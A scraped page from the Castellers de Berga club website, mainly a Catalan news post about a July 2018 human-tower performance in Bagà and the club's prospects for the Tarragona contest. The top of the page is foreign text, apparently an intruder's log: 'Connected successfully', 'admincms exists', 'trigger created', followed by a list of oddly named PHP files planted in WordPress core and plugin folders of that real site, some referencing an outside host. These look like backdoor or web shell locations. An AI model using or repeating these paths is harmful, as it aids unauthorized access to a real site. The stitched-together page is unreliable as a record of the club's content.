Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/includes/nav-menu-meta-meta-ajax-stream-stream-private-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/widgets-meta-cron-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/edit-ajax-private-core-wp-cron-wp-core-cron-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-ajax-core-stream-private-cron-core-ajax-response-meta-ajax-response-private.php https://castellersdeberga.cat/wp-content/plugins/revslider/uninstall-ajax-core-ajax-ajax-response-meta-ajax-response-stream.php https://castellersdeberga.cat/wp-includes/block-supports/duotone-cron-ajax-cron.php https://castellersdeberga.cat/wp-includes/random_compat/random_bytes_libsodium_legacy-private-private-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Per anar a Tarragona es passa per Bagà
 

Per anar a Tarragona es passa per Bagà


Per anar a Tarragona es passa per BagàAvui diumenge 8 de juliol de 2018, els Castellers de Berga hem completat una magnífica actuació a Bagà, descarregant els nostres millors castells. En l’inici de la Setmana Medieval de Bagà – una actuació a la Plaça Galceran de Pinós que ja va sent tradicional els últims anys – hem descarregat el segon 5 de 7 de la temporada, el segon 2 de 7 de la temporada i el 4 de 7 amb agulla en tercera ronda. Una actuació al màxim nivell. La torre de 7 (o 2 de 7) l’havíem carregat a Bagà el 2016 i 2017 però mai no l’havíem aconseguit descarregar a la Plaça Porxada.

Amb aquesta actuació els Castellers de Berga ens apropem una mica més a la Tàrraco Arena Plaça, a Tarragona. Cada dos anys (els anys parells) se celebra el Concurs de Castells. Les 12 colles amb les millors puntuacions entre el 31/8/17 i el 31//8/18 es classifiquen per la jornada de diumenge 7/10/18. Les següents 18 millor colles participen a la jornada del dissabte 6/10/18 a la TAP (Tàrraco Arena Plaça). Els Castellers de Berga estem ara mateix a les portes d’entrar en aquesta jornada de dissabte. Les 12 següents colles participen a la sessió del concurs, a Torredembarra, el diumenge 30 de setembre. Per sumar més punts i entrar a la TAP els Castellers de Berga només tenim una altra diada: la del 6è aniversari el 14 de juliol a Berga. La següent actuació ja és el setembre. La resta de colles també fan castells i no serà fins el 31/8/18 que se sabran les colles que participen a cada jornada del concurs.
A Bagà, avui diumenge 8 de juliol, també ens hi han acompanyat els Margeners de Guissona i els Castellers de Castelldefels. Han completat bones actuacions descarregant castells de 6 pisos.
La jornada s’ha tancat amb un dinar, guerra d’aigua i sessió de punxadiscos amb PD Nanfu i Salas Xic al municipi més petit de Catalunya: Gisclareny. Han dinat 150 persones en un poble on oficialment hi ha 27 persones censades.